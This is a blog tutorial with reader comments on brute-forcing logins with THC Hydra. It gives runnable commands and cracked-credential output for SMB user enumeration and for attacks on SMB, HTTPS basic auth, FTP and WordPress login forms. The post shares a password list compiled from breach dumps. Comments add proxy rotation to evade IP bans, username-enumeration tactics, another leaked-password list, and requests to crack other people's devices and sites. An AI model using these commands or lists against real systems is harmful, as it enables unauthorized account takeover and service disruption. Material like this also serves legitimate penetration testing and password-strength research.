Sometimes the only way in is to resort to password cracking (or, “brute forcing”). I would consider this to be another one of those last resort methods that I use when all else has failed.
I don’t like to use brute force methods because they’re noisy and can break stuff. There’s actually a fine line between a brute force and a denial of service attack, so be careful whenever using this method.
Anyway, there are 3 programs that I use when it comes to brute forcing passwords. There’s something I wrote (which is not public, so I wont be releasing it.. sorry. 
), there’s ncrack, which is relatively new and still under development, and then there’s THC Hydra.
I think ncrack will be a solid contender in this arena after it’s be fine tuned, but as of this point, Hydra is still the leader, so that’s what I’m going to focus on in this post.
Hydra has the ability to brute force passwords over a multitude of services:
Supported protocols: telnet ftp pop3[-ntlm] imap[-ntlm] smb smbnt http[s]-{head|get} http-{get|post}-form http-proxy cisco cisco-enable vnc ldap2 ldap3 mssql mysql oracle-listener postgres nntp socks5 rexec rlogin pcnfs snmp rsh cvs svn icq sapr3 ssh2 smtp-auth[-ntlm] pcanywhere teamspeak sip vmauthd
A couple examples…
First, grab the userlist from the PDC…
nmap --script=smb-enum-users 192.168.0.3 -p 445|perl -le 'while(<STDIN>){if(/^.*?\\(\w+)\s+.*/) { print "$1"; }}' >> userlist |
Then run the userlist through Hydra..
# hydra -L userlist -P password 192.168.0.3 smb
[INFO] Reduced number of tasks to 1 (smb does not like parallel connections)
Hydra v5.4 (c) 2006 by van Hauser / THC – use allowed only for legal purposes.
Hydra (http://www.thc.org) starting at 2010-06-17 12:08:24
[DATA] 1 tasks, 1 servers, 180 login tries (l:30/p:6), ~180 tries per task
[DATA] attacking service smb on port 139
[139][smb] host: 192.168.0.3 login: Administrator password: zygote
[139][smb] host: 192.168.0.3 login: audit password: qwerty
[139][smb] host: 192.168.0.3 login: bdouglas password: javajoe
[139][smb] host: 192.168.0.3 login: security password: qwerty
[139][smb] host: 192.168.0.3 login: testuser password: qwerty
[STATUS] attack finished for 192.168.0.3 (waiting for childs to finish)
Hydra (http://www.thc.org) finished at 2010-06-17 12:08:24
You’ll notice that I started the attack at 12:08:24 and it finished at 12:08:24, to give you an idea of the speed.
The next example will be attacking their website. Their website uses .htaccess to protect certain areas. We’ll use the same userlist that we stole from the PDC and hope that one of them is listed in the .htpasswd file.
# hydra -L userlist -P password www.companysite.com https-head /financials/
Hydra v5.4 (c) 2006 by van Hauser / THC – use allowed only for legal purposes.
Hydra (http://www.thc.org) starting at 2010-06-17 12:15:15
[DATA] 16 tasks, 1 servers, 217 login tries (l:31/p:7), ~13 tries per task
[DATA] attacking service http-head on port 443
[443][www] host: 11.22.33.44 login: bdouglas password: javajoe
[STATUS] attack finished for www.companysite.com (waiting for childs to finish)
Hydra (http://www.thc.org) finished at 2010-06-17 12:15:22
Great, found one. Now it would be really handy to have access to the FTP site for their website…
# hydra -L userlist -P password ftp.companysite.com ftp -f
Hydra v5.4 (c) 2006 by van Hauser / THC – use allowed only for legal purposes.
Hydra (http://www.thc.org) starting at 2010-06-17 12:24:14
[DATA] 16 tasks, 1 servers, 224 login tries (l:32/p:7), ~14 tries per task
[DATA] attacking service ftp on port 21
[21][ftp] host: ftp.companysite.com login: bdouglas password: javajoe
Hydra (http://www.thc.org) finished at 2010-06-17 12:24:17
This bdouglas guy has access everywhere.. and he’s super original with his passwords, too.
As you can see, hydra is pretty effective when it comes to brute forcing various services. The most important part is to have an effective password list.
Because humans are, well, human, they tend to think alike. That’s why passwords like, “love” and “sex” and “password” are always amongst the top of the “Most Frequently Used Passwords” list. So, what I’ve done is collected password lists from various network compromises where a password list was made public and combined them all into one gigantic list of 17,965,793 passwords and wrote a little script to make sure there are no duplicates.
The sources used to create this list are:
What we wind up with, is an enormous list of the most popular passwords, which is incredibly effective.
And, because I’m such a nice and wonderful guy, I’ve decided to share it with my readers. You can find it here. It’s bzipped and still about 95 megs.
You can find THC at www.thc.org and you can find THC Hydra at http://freeworld.thc.org/thc-hydra/
It’s also worth mentioning, though, that Hydra seems to fall short when it comes to web forms. Theoretically, it’s capable of handling a web form, but I’ve yet to be able to make it work. For that, I use other utilities.. which I’ll blog about here at some point.
However, according to the Hydra documentation, this is how it’s supposed to work against a web form:
# hydra -l admin -P passwod www.wordpressblogsite.org http-post-form “/wordpress/wp-login.php:user_login=^USER^&user_pass=^PASS^:Incorrect” -t 4
What this is telling Hydra is that in the form, the two input boxes are named “user_login” and “user_pass”, respectively, and that Hydra should fill in those blanks with the various username and password combinations specified via the command line.
How you figure out what the form input boxes are named.. simply go to the website, view the source of the page, and look for:
…snip…
input type=”text” name=”log” id=”user_login” class=”input”
..snip…
input type=”password” name=”pwd” id=”user_pass” class=”input”
Pretty simple.. but, again, Hydra doesn’t seem to like it. If you’ve gotten this to work yourself, please let me know. I’d be interested in seeing what I’m doing wrong.
Related posts:
I’d be interested to know what you use your personal cracker for (anything specific or an all around good cracker). Also, last night I started piecing together a wordlist as well. I feel like everything I’m looking for at a given time, I can just find on your blog. strange. But definitely another great read.
@Erik: My personal one is a lot like Hydra, but I feel more comfortable with it. Also, unlike Hydra, you don’t have to specify the post type (ie – is it .htaccess, or is it a phpform?) It determines this on it’s own. It also does some other trickery that just makes it easier to use, in my opinion.
But, Hydra is a perfectly good alternative to it.. it’s just a little more clunky and less automated.
I might eventually release my cracker.. but I would first have to clean up the code as to not embarrass myself..
haha…we don’t judge :-p
@Erik: Pfft.. with the amount of trash talking I do on here about other peoples sloppy, buggy, vulnerable code.. I’d be nailing myself to the cross if I released anything that wasn’t (mostly..) perfect.. lol
Ah… that nifty tool
From my point of view I think that brute forcing should be considered when doing an internal pentest instead of using it as last resort for any other purpose mainly because there are those noises and nearly denial of service caveats already mentioned. It’s more easily when you have some insight on resource usage and restrictions on the system being tested because you can customize enough how to use the tool in a way that it’s less disruptive.
The good thing though is that many people use really bad user/password combination so noise and resource considerations are not necessarily a concern.
There are quite a few brute force tools around, but I think Hydra is just great because the amount of service it handles, although there’s always the chance that a specialized tool can do a better work with a specific service, having one that does the job very well on so many different services is a great plus.
As far as the web form goes, I did a test after reading this but did end the same way you did. Still don’t know if there’s something missing on the params or what but didn’t have enough time to play with it so I will be checking that later.
Thanks for the fun reading and I hope you consider releasing your cracker, c’mon, others should be able to make fun of your sloppy, buggy, vulnerable code too… nah, just joking
@netalien: As a pen tester, it’s kind of interesting when you run into companies who say “Don’t touch this” or “Don’t test that” or “Make sure you don’t break this” because, really, trying to break stuff is part of the test. If doing a brute force attack against a system breaks it, you have a serious issue because someone else out there, with ill intent, will eventually try the same thing. I mean, I understand where they’re coming from, because no one wants to deal with a downed critical service at 4am, but, in reality, that’s kind of par for the course on the internet. It’s really doing an injustice.
Yeah, I’m going to have to play around with Hydra a bit more, too, to see if I can get the web form stuff working. According to the docs, it should…
And.. ha! So much peer pressure to release it. I promise that at some point I will.
A good point indeed, that’s when the social engineer skills come in handy.
Normally those who don’t understand the risks or don’t have the technical staff (or even interest) to deal with things like risk assessment and management, incident response, and the cost associated with data loss or a breach compared with a system down for an hour because a pen test, are the first one to say “test this but not that, because we depend on that”, which as you said, it’s an incomplete approach.
Those systems that are more dependable on are the ones that need more the assessment, without leaving the less dependable out though. In the end, all an interested attacker will need is one point of access, if that happens to be your more important system that should not be touched during the pen test, bad luck, it’s not a concern for him/her, he/she wants to break in, doesn’t matter if it hurts infrastructure stability, company reputation and so on…
[...] Brute Force with THC Hydra | Attack Vector [...]
I use a cracker that I made in PHP. It’s important to have it connect through different proxies because some sites will ban your IP address if to many failed attempts happen.
You should check out medusa. http://www.foofus.net/~jmk/medusa/medusa.html
@kn1ghtmare: Thanks.. I’ve been meaning to play with Medusa, but I haven’t had a chance yet. I’ll add it to my list.. I do know that everyone says it’s better than Hydra, which I believe.. lol
really tnx for this tutorials. i now have lots of clues on hydra.
but can u show me how did you come up with nmap? u extracted the userlist. how?
i tried it but nmap doesnt recognize the command.
please help.
tnx a lot.
@nick: It looks like when I pasted the code, my theme removed the “STDIN” in between the brackets in the while statement. So, it should look like this:
@matt
i haven’t got the users….
tnx again ang sorry for the late response… been busy…
i’ve tested your code and yes nmap recognized the commands. but a badluck to me
the userlist is empty….
but thank you very much again…helps lot!
@matt
hey i forgot!
tnx for the wordlist!
@nick: lol.. np man.
I am new to hydra. I want to break a Zykel AP but there is only a password entry. With madusa I can use the command ;;password to have the program look for passwords. How do I do this with hydra.
hi, thanks for your good work.
I tried hydra and it’s works on pop3 email.
I fail make it work with web form.
I use (in windows 7 with “cmd” dos emulation):
hydra -l dafne1 -P fiopass.txt -o log.txt xxxxx.xxxxx.com http-post-form “/index.php:loginName=^USER^&loginPasswd=^PASS^:failure”
and result is a list with all attempts:
login: dafne1 password: pass1
login: dafne1 password: pass2
login: dafne1 password: pass3
……
but no indication on what is the right password!!!!
(in fiopass.txt there is also the right password)
you can help me please????
i can write you in private???
thanks
(sorry for my bad english)
What´s the PDC? xP
I have gotten hydra to work on Http forms GET and POST and the syntax you have written is almost perfectly fine:
# hydra -l admin -P passwod http://www.wordpressblogsite.org http-post-form “/wordpress/wp-login.php:user_login=^USER^&user_pass=^PASS^:Incorrect” -t 4
Obivously you need to feed it a set username or username list and a set password or password list. Lowercase (-l or -p) is set username/password uppercase (-L or -P) is password list. (In the above case you’ve used uppercase P but not provided a list, instead you’ve provided a set password (unless you have a file names passwod in your current folder?)
Replace the word “Incorrect” with whatever unique string is returned on failure. “Invalid password” whatever.
If the site is insecure enough to provide a different string for incorrect usernames than it does for incorrect passwords, then it’s a good idea to use a set unlikely password and a list of usernames to enumerate a list of valid usernames first. You can then use this list of valid usernames to save yourself alot of time.
I have noticed there are a couple of flaws in Hydras form cracking methods though.
1: If the form uses POST for the usernames and passwords but uses GET for other information simultaniously you will have to do a little work to see which the form will accept as hydra wont allow you to mix. For example a site i came across recently used POST for users and passwords but GET for an extra variable “Confirm=1″ using POST on hydra wouldn’t work because the site wouldnt take confirm=1 POSTed. However using hydra’s GET attack did work because the site would take the usernames and passwords as GET. If that makes any sense?
2: The very same site would allow me up to 1200 attempts a min. However because hydra only allows you to pass it a string to search for on an unsuccessful attempt, And if that string isn’t found it assumes valid. Whilst going at speed it will often only half download pages (stopping before the the invalid string in the page). This returned false positives. As hydra doesn’t allow you to tell it to continue with the same username even after it’s found the password. This resulted in it getting a false positive and moving on to the next username. If this option was available false positives wouldn’t matter so much because it would still go on to test the rest of the password list against that username. After hydra has finished you could then go on to test all the false positives again which would take no time. Instead hydra skips that username believing it’s found the password already. Without changing the code theres no way to prevent this. Also as mentioned before hydra will only allow you to set a string for incorrect attempts, if it isn’t found it’s assumed valid. I happened to have a valid U/P for this site. Therefore I had access to a string that would only be returned if the attempt was valid. If hydra would allow a double check “Invalid” if it’s invalid and “Welcome” if it’s valid this wouldalso prevent false positives. If could recheck a password each time BOTH requirements arn’t fulfilled. (In the case that “Invalid doesn’t appear, and neither does “Welcome”) If either of these options were added (a valid string parameter and a continue with same username after successful login option) These somewhat major problems could be avoided.
These problems serve to make hydra a thousand times less automated. Each time there’s a false positive I have to stop hydra open the password list, remove the passwords up to the false positive and save the password file as new with the username it stopped on appended to the name. Then start the search with that username again with the altered password file. Frustrating to say the least when you have 7 admin usernames and want to pass a very large password file through each one of them.
Anyway I hope this has helped explain Hydras form method a little better. I know my explanation skills aren’t great so, sorry about that
@Matt: thank you for this tutorial! In addition, nice password list
I set up an ASUS WL-500gP with original ASUS firmware to my LAN with IP address 192.168.1.1. If I navigate to address http://192.168.1.1:8080/ in my Firefox address bar, an “Authentication required” window opens up asking for “User name: ” and “Password: “. Correct “User name: ” is “admin” and correct “Password: ” is “pA55w0Rd”. They work fine if I type them in manually to the “Authentication required” window, but for some reason I can’t get in using the hydra with words.txt password file, which contains “pA55w0Rd”:
http://pastebin.com/ukm88xet
What might cause this? If any additional information is needed, please ask!
So in the end… is there another tool besides hydra to carack wordpress?
i am also having the same problem…
although i am doing the brute force attack but no result
hydra -l admin -P passwd.txt 192.168.1.1 https-head /protected/login/
Hydra v7.0 (c)2011 by van Hauser/THC & David Maciejak – for legal purposes only
Hydra (http://www.thc.org/thc-hydra) starting at 2011-10-13 11:48:59
[DATA] 11 tasks, 1 server, 11 login tries (l:1/p:11), ~1 try per task
[DATA] attacking service http-head on port 443
[443][www] host: 192.168.1.1 login: admin password: test2
[443][www] host: 192.168.1.1 login: admin password: admin
[443][www] host: 192.168.1.1 login: admin password: test1
[443][www] host: 192.168.1.1 login: admin password: 12345678
[443][www] host: 192.168.1.1 login: admin password: 12345678
[443][www] host: 192.168.1.1 login: admin password: root
[443][www] host: 192.168.1.1 login: admin password: 123456789
[443][www] host: 192.168.1.1 login: admin password:
[443][www] host: 192.168.1.1 login: admin password: 123
[443][www] host: 192.168.1.1 login: admin password: super
[443][www] host: 192.168.1.1 login: admin password: abcdefg
[STATUS] attack finished for 192.168.1.1 (waiting for children to finish)
1 of 1 target successfuly completed, 11 valid passwords found
Hydra (http://www.thc.org/thc-hydra) finished at 2011-10-13 11:49:06
@Elwon
About your 2nd point. Actually, hydra does allow you to specify a success condition instead of a failure.
Read the output of “hydra -U http-form-post”.
Here is a relevant portion:
Third is the string that it checks for an *invalid* login (by default)
Invalid condition login check can be preceded by “F=”, successful condition
login check must be preceded by “S=”.
Hey buddy great stuff any chance on telling me more about the nmap –script=smb-enum-users 192.168.0.3 -p 445|perl -le ‘while(){if(/^.*?\\(\w+)\s+.*/) { print “$1″; }}’ >> userlist
script as i have tried and tried and cant get any user data from any servers.
Would like to understand it a bit more,
Thanks!
Large password list is available from http://dazzlepod.com/uniqpass/; pretty useful for an effective large scale dictionary attack!